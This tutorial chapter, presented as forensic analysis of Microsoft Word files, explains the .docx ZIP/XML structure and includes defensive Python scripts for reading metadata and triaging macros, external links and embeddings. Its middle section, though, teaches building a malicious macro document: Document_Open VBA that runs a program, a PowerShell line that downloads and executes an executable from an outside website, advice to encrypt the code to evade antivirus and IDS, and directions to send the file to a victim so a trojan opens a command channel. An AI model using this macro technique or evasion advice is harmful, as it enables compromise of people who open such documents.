Forensic Investigation - Microsoft Word Document. 0x04
In previous chapters on forensics we learnt:
In this chapter we will learn:
Let's rock.
In today's world, we rely heavily on Microsoft Word documents. It is the most used document format globally and is considered one of the most advanced file structures.
From a developer's perspective, it is very complex, yet it remains easy to use for the average user.
Word documents can integrate various elements such as voice, videos, AI-based voice dictation, images, flowcharts, and animations. Essentially, it has everything you need.
In our earlier chapter we learned that increased integration leads to greater file complexity.
Microsoft also makes Word documents accessible from programming languages such as VC++ and VB, to name a few. This allows these languages to create well-presented Word documents and integrate them with clients' customized applications.
Let's understand the file structure of Microsoft Word documents.
Before we begin, remember that Microsoft Word and Excel documents (.DOCX and .XLSX) are actually ZIP files. These ZIP files contain multiple “.xml” files inside them.
Once the “.docx” is unzipped, we can see the file structure. The image below shows the structure of the file. I have created a file called “qrc.docx”, which is a Word document containing a simple phrase in Sanskrit.
The content of a normal Word document:
The Sanskrit shloka font is “Nirmala UI”, bold, font size 20, center aligned.
The next two phrases use the font “Roboto”, size 15, both aligned to center.
Why am I telling you this?
Because this font, font size, text alignment and bold text, whatever we did in the Word document, is recorded as-is in the “.docx” file. When we do a forensic analysis of the file, we will know the metadata of the Word document, e.g. who created it, on what date it was modified, by whom, etc.
Once we understand the file structure we can add malware which will get executed when the document is opened by the user. The user needs to allow “Enable Macro” for this.
There are many companies where the security levels of browsers and document settings are not configured. This is really concerning; they don't take computer security seriously. Anyway, let's proceed.
Let's extract the Word document with "7zip.exe".
The image above shows that we have extracted the “qrc.docx” file with “7zip.exe”, one of the best unzippers on the market today. Its compression ratio is very high for big files, and almost all well-known archive formats can be extracted with it; the “BEST TOOL”.
Now let's understand the file structure and its files, for forensic analysis and for writing malware too.
qrc.docx File Structure
A .docx file is essentially a zip archive containing multiple XML files and directories that define the content and formatting of the document.
Let's look at a simplified structure with the provided content as an example (note that the real OOXML namespace URIs use http://, not https://; Word will not recognise the parts otherwise):
1. [Content_Types].xml :
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>
  <Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/>
  <!-- Additional overrides for other parts like fonts, settings, etc. -->
</Types>
2. _rels/.rels :
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>
  <!-- Other relationships -->
</Relationships>
3. word/document.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body>
    <w:p>
      <w:r>
        <w:t>?????? ?? ???????? ?????? ????????? ????????????????????????????? ?????? ???? ???????</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Union is indeed invincible. In union there is greater strength. In union there is a bond with friends. Union becomes power.</w:t>
      </w:r>
    </w:p>
    <!-- More paragraphs as needed -->
  </w:body>
</w:document>
4. word/styles.xml :
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:rPr>
      <w:sz w:val="24"/> <!-- Font size, in half-points (24 = 12 pt) -->
      <!-- Other properties like font family, color, etc. -->
    </w:rPr>
  </w:style>
  <!-- Other styles -->
</w:styles>
Important points :
This is how our “qrc.docx” has been created by MS Word: from the outside it looks like a single file, but internally it is made up of many linked files. We have written only text into it, which is why it has very few files. If we had inserted images, voice data, flow charts etc., more files and tags would have been added. For simplicity, and to understand the main part, we will stick to the main tags and main files, as Microsoft's files are very complex. The extension of our qrc.docx is “.docx”, which is a non-macro document format and is safe to open in Word.
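The structure above can be checked programmatically rather than by eye. The following Python script is an added example, not code from the original article: it builds a minimal text-only package like qrc.docx in memory from constructed parts (the Sanskrit run is a placeholder, and the author names and dates in docProps/core.xml are made up), then reads back the part inventory, resolves each part's content type from [Content_Types].xml, recovers the font, size, bold and alignment that Word recorded for each paragraph, and pulls the creator and last-modified metadata that a forensic examiner looks at first. It adds docProps/core.xml, which the simplified listing above omits; Word writes it into every document.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Real OOXML namespace URIs (note: http://, not https://)
NS = {
    "w": "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
    "ct": "http://schemas.openxmlformats.org/package/2006/content-types",
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}
W = "{%s}" % NS["w"]

# Constructed sample parts of a text-only document like qrc.docx (the Sanskrit run is a placeholder,
# author names and dates are made up). Font sizes are stored in half-points: w:sz 40 = 20 pt, 30 = 15 pt.
SAMPLE_PARTS = {
    "[Content_Types].xml": (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        '<Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/>'
        '</Types>'),
    "_rels/.rels": (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
        '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/>'
        '</Relationships>'),
    "word/document.xml": (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body>'
        '<w:p><w:pPr><w:jc w:val="center"/></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Nirmala UI"/><w:b/><w:sz w:val="40"/></w:rPr>'
        '<w:t>[Sanskrit shloka placeholder]</w:t></w:r></w:p>'
        '<w:p><w:pPr><w:jc w:val="center"/></w:pPr><w:r><w:rPr><w:rFonts w:ascii="Roboto"/><w:sz w:val="30"/></w:rPr>'
        '<w:t>Union is indeed invincible.</w:t></w:r></w:p>'
        '</w:body></w:document>'),
    "docProps/core.xml": (
        '<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" '
        'xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" '
        'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
        '<dc:creator>sample-author</dc:creator><cp:lastModifiedBy>sample-editor</cp:lastModifiedBy>'
        '<dcterms:created xsi:type="dcterms:W3CDTF">2024-01-01T10:00:00Z</dcterms:created>'
        '<dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-02T11:30:00Z</dcterms:modified>'
        '</cp:coreProperties>'),
}

def build_docx(parts):
    """Zip a {part name: xml text} mapping into .docx bytes (the package really is just a ZIP)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()

SAMPLE_DOCX = build_docx(SAMPLE_PARTS)

def paragraph_info(p):
    """Text, alignment and first-run formatting of a <w:p>: exactly what Word recorded."""
    jc = p.find("w:pPr/w:jc", NS)
    rpr = p.find("w:r/w:rPr", NS)
    info = {"text": "".join(t.text or "" for t in p.iter(W + "t")),
            "align": jc.get(W + "val") if jc is not None else "left",
            "font": None, "size_pt": None, "bold": False}
    if rpr is not None:
        fonts, sz = rpr.find("w:rFonts", NS), rpr.find("w:sz", NS)
        info["font"] = fonts.get(W + "ascii") if fonts is not None else None
        info["size_pt"] = int(sz.get(W + "val")) / 2 if sz is not None else None
        info["bold"] = rpr.find("w:b", NS) is not None
    return info

def inspect_docx(data):
    """Part inventory, resolved content types, paragraph formatting and core metadata of a .docx."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        types = ET.fromstring(zf.read("[Content_Types].xml"))
        defaults = {d.get("Extension").lower(): d.get("ContentType") for d in types.findall("ct:Default", NS)}
        overrides = {o.get("PartName"): o.get("ContentType") for o in types.findall("ct:Override", NS)}
        # An Override names the part explicitly; otherwise the type comes from the extension Default.
        content_types = {n: overrides.get("/" + n, defaults.get(n.rsplit(".", 1)[-1].lower(), "unknown")) for n in names}
        doc = ET.fromstring(zf.read("word/document.xml"))
        paragraphs = [paragraph_info(p) for p in doc.iter(W + "p")]
        core = {}
        if "docProps/core.xml" in names:
            root = ET.fromstring(zf.read("docProps/core.xml"))
            for tag in ("dc:creator", "cp:lastModifiedBy", "dcterms:created", "dcterms:modified"):
                el = root.find(tag, NS)
                core[tag] = el.text if el is not None else None
    return {"parts": names, "content_types": content_types, "paragraphs": paragraphs, "core": core}

if __name__ == "__main__":
    import json
    print(json.dumps(inspect_docx(SAMPLE_DOCX), indent=2))
```

To run it against a real file, replace SAMPLE_DOCX with the bytes of the document (open(path, "rb").read()); the same functions work because Word stores nothing outside the ZIP. Note that docProps/core.xml is the part that answers "who created it, when, and who last modified it", and that it is plain XML anyone can edit, so its values are a lead, not proof.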
Now let's create a macro-enabled document which connects to our malicious website. The VBA code will download “calc.exe” from the website and, once downloaded, execute it. Here we are downloading “calc.exe”; instead of this we could run our own trojan, which we created in our earlier chapters.
Creating a macro Word file: the image below shows the steps to create a macro-enabled file in Microsoft Word.
Once you do the above correctly it will open the VBA editor, where you can write the malicious encrypted code.
Once the coding part is done, save the file as "demo_malware.docm".
The file extension should be ".docm", not ".docx". If it is ".docx", the macro will not run; please note.
Now our malware-enabled document is ready. We can send this to our victim. Once the document is opened it will execute the trojan and open the required port, so the cybercriminal can connect to it through the IRC chat command channel which we have seen earlier.
The malicious VBA code:
Private Sub Document_Open()
    Dim WshShell As Object
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run "calc.exe"
End Sub
' this routine is not required (VBA comments start with an apostrophe, not //)
Sub runcalc()
    Call Document_Open
End Sub
Be creative when writing the encryption code to hide the malicious code; otherwise, the antivirus software will detect it and the document won't open. Use this new command to download 'calc.exe' from an HTTPS website and run it.
This is again one of the most popular commands used by malware writers. To keep the command unnoticed by antivirus and IDS/IPS, the malware writer always encrypts it. When they want to execute the script, they decrypt it dynamically and then execute it.
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "powershell.exe -Command ""Invoke-WebRequest -Uri 'https://www.aquasan.co.in/calc.exe' -OutFile 'C:\tmp\a\calc.exe'"""
WshShell.Run "c:\tmp\a\calc.exe"
Once “demo_malware.docm” is created, let's open it in MS Word. As soon as we open it, we will get an alert message in the MS Word application that says "Enable Macro". If we enable it, the VBA script gets executed, and with it our malicious code.
The image below shows the alert message.
After enabling the macro, the malicious macro script runs; the image below shows calc.exe being executed. Instead of this we could have run the trojan too.
Let's understand how it gets executed.
Microsoft Word exposes an internal object model. The “Document_Open” event handler runs automatically as soon as the document is opened, because Document_Open is a predefined event in Word VBA that fires when the document opens. There are many events like this, for example:
' Built-in document-level events that Word raises for ThisDocument: Document_New, Document_Open, Document_Close
Private Sub Document_Open()
    MsgBox "Malware Executed !!! "
End Sub
Private Sub Document_Close()
    MsgBox "Malware Executed !!! "
End Sub
Private Sub Document_New()
    MsgBox "Malware Executed !!! "
End Sub
' Note: Word's Document object has no Save or Change event, so Word never calls the next two handlers;
' DocumentBeforeSave and DocumentChange exist only as Application-level events.
Private Sub Document_Save()
    MsgBox "Malware Executed !!! "
End Sub
Private Sub Document_Change()
    MsgBox "Malware Executed !!! "
End Sub
' Note: WindowSelectionChange is also an Application-level event, reached only through an object
' variable declared WithEvents, not through a handler placed directly in ThisDocument.
Private Sub Window_SelectionChange(ByVal Sel As Selection)
    MsgBox "Malware Executed !!! "
End Sub
These are a few events from which VBA code can be executed.
So, in short, whatever you want to execute, e.g. a trojan script, attach it to one of the Word events above. It is sure to execute.
Important files for forensic analysis; check these once you unzip the .docx file:
- Embedded Objects: Look for any embedded objects that could be executables or scripts.
- Suspicious Content: Watch out for strange or hidden text that might contain malicious code.
- Hyperlinks: Check for links that could lead to dangerous websites.
- External Relationships: Look at links to external files or URLs that might download harmful content.
- OLE Object Relationships: Find and check any linked OLE objects.
- Embedded Files: Look for any files embedded in the document, like .exe or .js files.
- Macros: Check the VBA code for malicious scripts.
- Embedded Media: Look at images and media files for hidden data or steganography.
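The checklist above, turned into a triage script. This is an added example and not part of the original article: it constructs an inert stand-in for a macro-enabled package (placeholder OLE and PNG header bytes, an external hyperlink to the reserved example.invalid host, one OLE embedding, one hidden-text run, and no macro source at all) and then walks it for each item on the list: the macroEnabled content type, the vbaProject.bin part, every relationship with TargetMode="External", hyperlinks, OLE object links, files under word/embeddings/ and word/media/, and text runs formatted as hidden with w:vanish.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
REL = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # OLE compound-file header; vbaProject.bin and OLE embeddings start with it

def build_zip(parts):
    """Pack {part name: str or bytes} into a ZIP, i.e. a .docx/.docm package."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, payload in parts.items():
            zf.writestr(name, payload)
    return buf.getvalue()

# Constructed stand-in for a macro-enabled demo_malware.docm. Every binary part is an inert
# placeholder (only the OLE/PNG header bytes) and no macro source is included.
SAMPLE_DOCM = build_zip({
    "[Content_Types].xml": (
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
        '<Default Extension="png" ContentType="image/png"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>'
        '</Types>'),
    "_rels/.rels": (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
        '</Relationships>'),
    "word/_rels/document.xml.rels": (
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.invalid/update" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"/>'
        '<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="embeddings/oleObject1.bin"/>'
        '<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/>'
        '</Relationships>'),
    "word/document.xml": (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body>'
        '<w:p><w:r><w:t>Quarterly report</w:t></w:r>'
        '<w:r><w:rPr><w:vanish/></w:rPr><w:t>this run is hidden</w:t></w:r></w:p>'
        '</w:body></w:document>'),
    "word/vbaProject.bin": OLE_MAGIC + b"\x00" * 64,
    "word/embeddings/oleObject1.bin": OLE_MAGIC + b"\x00" * 16,
    "word/media/image1.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
})

def triage(data):
    """Walk the package once and collect every item on the forensic checklist."""
    f = {"macro_content_type": False, "vba_project": None, "external_targets": [], "hyperlinks": [],
         "ole_objects": [], "embedded_files": [], "media_files": [], "hidden_text": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        # Macros: the main part is declared macroEnabled and/or a vbaProject.bin part exists
        for el in ET.fromstring(zf.read("[Content_Types].xml")).iter():
            if "macroEnabled" in (el.get("ContentType") or ""):
                f["macro_content_type"] = True
        for name in names:
            if name.endswith("vbaProject.bin"):
                f["vba_project"] = {"part": name, "is_ole": zf.read(name).startswith(OLE_MAGIC)}
            elif "/embeddings/" in name:          # Embedded files (OLE packages, .exe, .js ...)
                f["embedded_files"].append(name)
            elif "/media/" in name:               # Embedded media worth a steganography look
                f["media_files"].append(name)
            if name.endswith(".rels"):            # Relationships: external targets, hyperlinks, OLE links
                for r in ET.fromstring(zf.read(name)).iter(REL + "Relationship"):
                    kind, target = r.get("Type", "").rsplit("/", 1)[-1], r.get("Target")
                    if r.get("TargetMode") == "External":
                        f["external_targets"].append((name, kind, target))
                    if kind == "hyperlink":
                        f["hyperlinks"].append(target)
                    elif kind == "oleObject":
                        f["ole_objects"].append(target)
        if "word/document.xml" in names:          # Suspicious content: runs formatted as hidden (w:vanish)
            doc = ET.fromstring(zf.read("word/document.xml"))
            for run in doc.iter(W + "r"):
                if run.find(W + "rPr/" + W + "vanish") is not None:
                    f["hidden_text"].append("".join(t.text or "" for t in run.iter(W + "t")))
    return f

def needs_deeper_look(findings):
    """True when anything on the checklist fired; the file is then a candidate for sandboxing and macro extraction."""
    return bool(findings["macro_content_type"] or findings["vba_project"] or findings["external_targets"]
                or findings["ole_objects"] or findings["embedded_files"] or findings["hidden_text"])

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_DOCM), indent=2))
```

This script only establishes that a VBA project stream is present and is an OLE compound file; reading the macro source out of word/vbaProject.bin needs an OLE and MS-OVBA decompression parser, which is what olevba from the oletools project does (assumed installed separately; it is not used here). The external-relationship check is deliberately generic: any relationship with TargetMode="External" is reported whatever its type, because that is where a document reaches outside the package.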
Microsoft Word, Excel and PowerPoint all support VBA. Now you know how to integrate a VBA script into Word and Excel and execute a trojan through it, and how to inspect the files by unzipping them.
In the next chapter we will try to hack or brute-force passwords from PDF files and Microsoft Word and Excel files. Till then, stay tuned.
Thanks a lot for your time.
See you then.